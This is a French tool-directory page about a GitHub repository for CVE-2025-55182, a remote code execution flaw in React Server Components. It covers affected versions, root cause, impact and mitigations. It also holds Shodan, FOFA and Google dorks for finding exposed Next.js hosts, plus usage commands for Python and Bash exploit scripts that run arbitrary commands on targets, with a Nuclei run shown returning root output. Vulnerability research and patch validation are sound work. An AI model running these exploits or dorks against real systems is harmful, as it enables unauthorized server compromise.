Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Une vulnérabilité critique d'exécution de code à distance (RCE) affectant l'implémentation des composants serveur React (RSC) dans plusieurs packages, notamment. | Kitploit
Outils/GitHubGitHub/cyberleelawat/cve-2025-55182
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Une vulnérabilité critique d'exécution de code à distance (RCE) affectant l'implémentation des composants serveur React (RSC) dans plusieurs packages, notamment.

11il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

CVE-2025-55182 – Exécution de code à distance dans les composants serveur React

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Créé par : Virendra Kumar

Société : Cyber Leelawat

Site Web : www.cyberleelawat.in

Aperçu

CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant l'implémentation des composants serveur React (RSC) au sein de plusieurs packages, notamment :

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

La vulnérabilité existe en raison d'une désérialisation non sécurisée des charges utiles envoyées via le protocole Flight interne utilisé par RSC. Lorsque certaines entrées non fiables transitent par les composants serveur React via des requêtes HTTP, l'exécution de code côté serveur peut être déclenchée.

Les versions affectées incluent :

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

Les versions corrigées incluent :

  • 19.0.1
  • 19.1.2
  • 19.2.1

Comment la vulnérabilité fonctionne (haut niveau)

Les composants serveur React acceptent les requêtes du côté client qui sont analysées et désérialisées sur le backend. La vulnérabilité provient de contrôles insuffisants autour de la désérialisation des données entrantes, permettant à des charges utiles spécialement conçues d'être interprétées comme des composants serveur exécutables.

Lorsque cela se produit, une exécution arbitraire de JavaScript peut survenir sur le serveur, ce qui peut conduire à une compromission complète du serveur en fonction de l'environnement d'hébergement et des privilèges.


Cause profonde

  • Absence de validation d'entrée appropriée dans les flux du protocole Flight RSC.
  • Limite de confiance du serveur supposée à tort comme sûre.
  • Analyse côté serveur non sécurisée à partir d'une entrée utilisateur non fiable.

Impact

Si elle est exploitée, un attaquant peut être en mesure de :

  • Réaliser une exécution de code à distance
  • Exécuter des commandes arbitraires côté serveur
  • Accéder à la base de données ou aux ressources au niveau du système d'exploitation
  • Installer des logiciels malveillants ou des portes dérobées
  • Voler des données sensibles
  • Effectuer un mouvement latéral au sein de l'infrastructure

Score CVSS : 10.0 – CRITIQUE


Tests manuels (Identification défensive sécurisée)

Objectif principal :

Vérifier si l'application expose les composants serveur React et si des versions affectées sont utilisées.

Étape 1 — Vérifier la présence de RSC via les caractéristiques de réponse

root@kitploit:~
curl -I https://cible.com/?__rsc=1

Reconnaissance Google (mots-clés défensifs)

Ces mots-clés aident à identifier si un référentiel public ou une application Web fait référence aux composants RSC.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Vérifier :

  • Les fonctionnalités RSC sont-elles présentes ?
  • Les packages sont-ils visibles dans les bundles front-end ?
  • Y a-t-il des références Git publiques ?

Exemples de requêtes Google internes (votre propre périmètre uniquement)

root@kitploit:~
site:votredomaine.com "react-server"
site:votredomaine.com "flight" "react"
site:votredomaine.com "rsc"

Destiné à l'audit interne du domaine de votre organisation uniquement.


Shodan (Empreinte technologique SÉCURISÉE)

Vérifiez l'utilisation exposée du framework, pas l'exploitation de vulnérabilité.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA Classification technologique uniquement

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Tests automatisés (Interne / Laboratoire)

Pour automatiser l'analyse défensive, clonez la logique de détection basée sur des modèles pour l'évaluation de votre propre infrastructure :

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Modèle Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Exploit RCE Python (CVE-2025-55182.py)

Script d'exploit RCE complet qui exécute des commandes arbitraires et récupère la sortie.

Utilisation :

root@kitploit:~
python3 CVE-2025-55182.py http://cible.com:3000 -c "id"
python3 CVE-2025-55182.py https://cible.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Exploit Bash

Installation

root@kitploit:~
chmod +x scanner.sh

Utilisation

root@kitploit:~
# Scanner avec commande par défaut (id)
./scanner.sh -d example.com

# Exécuter une commande personnalisée
./scanner.sh -d example.com -c "whoami"

# Avec URL complète
./scanner.sh -d https://example.com -c "uname -a"

Options

  • -d, --domain - Domaine/URL cible (obligatoire)
  • -c, --command - Commande à exécuter (par défaut : id)

Exemples

root@kitploit:~
# Vérifier si la cible est vulnérable
./scanner.sh -d vulnerable-app.com

# Obtenir les informations système
./scanner.sh -d vulnerable-app.com -c "uname -a"

# Lister les fichiers
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Prérequis

  • Bash
  • curl
  • openssl

Crédit : Le script Bash et Python a été créé à l'origine par @zack0x01 et @sickwell. Utilisé avec reconnaissance.

Les modèles dans le dépôt sont destinés à :

  • l'identification de version
  • les vérifications de visibilité
  • l'inventaire d'infrastructure
  • la sensibilisation aux vulnérabilités

IMPORTANT : Ces modèles ne doivent être exécutés que sur des systèmes que vous possédez ou pour lesquels vous êtes autorisé à effectuer une évaluation.


Nuclei (Déclaration d'utilisation défensive)

Les modèles Nuclei inclus dans ce dépôt sont destinés uniquement à :

  • la validation de version de dépendance
  • l'empreinte indirecte
  • les vérifications passives
  • l'audit de sécurité interne

Veuillez vous assurer :

  • d'avoir une autorisation écrite
  • de ne scanner que vos propres actifs
  • de respecter les lois et politiques locales

Atténuations recommandées

Mettre à jour immédiatement

Mettez à niveau vers l'une des versions corrigées :

  • 19.0.1
  • 19.1.2
  • 19.2.1

Si vous ne pouvez pas appliquer le correctif immédiatement

  • désactivez temporairement les fonctionnalités RSC
  • isolez les composants serveur
  • mettez en place des règles WAF
  • limitez la surface réseau exposée

🤝 Connectez-vous avec moi

👨‍💻 Cyber Leelawat

Chercheur en sécurité • Formateur en cybersécurité • Chasseur de bugs

Devise : Zero Trust Full Secure 🚀

Conclusion

CVE-2025-55182 est actuellement l'une des menaces les plus critiques pour les infrastructures basées sur React. En raison du vecteur d'exploitation trivial et de la surface d'attaque non authentifiée, l'application immédiate du correctif est fortement conseillée. Toute organisation exécutant des versions RSC affectées devrait considérer une priorisation d'urgence.


Avis légal / éthique

Ce dépôt et cette documentation sont destinés à la recherche défensive et à la validation de sécurité des actifs que vous possédez. Toute utilisation abusive peut être illégale. Vous êtes responsable du respect des lois et de la politique de l'organisation.

Fait avec ❤️ par Cyber Leelawat

Zero Trust Full Secure 🎯🔐

Télécharger l’outil
GitHub Instagram
LinkedIn Chaîne WhatsApp
Groupe Communauté WhatsApp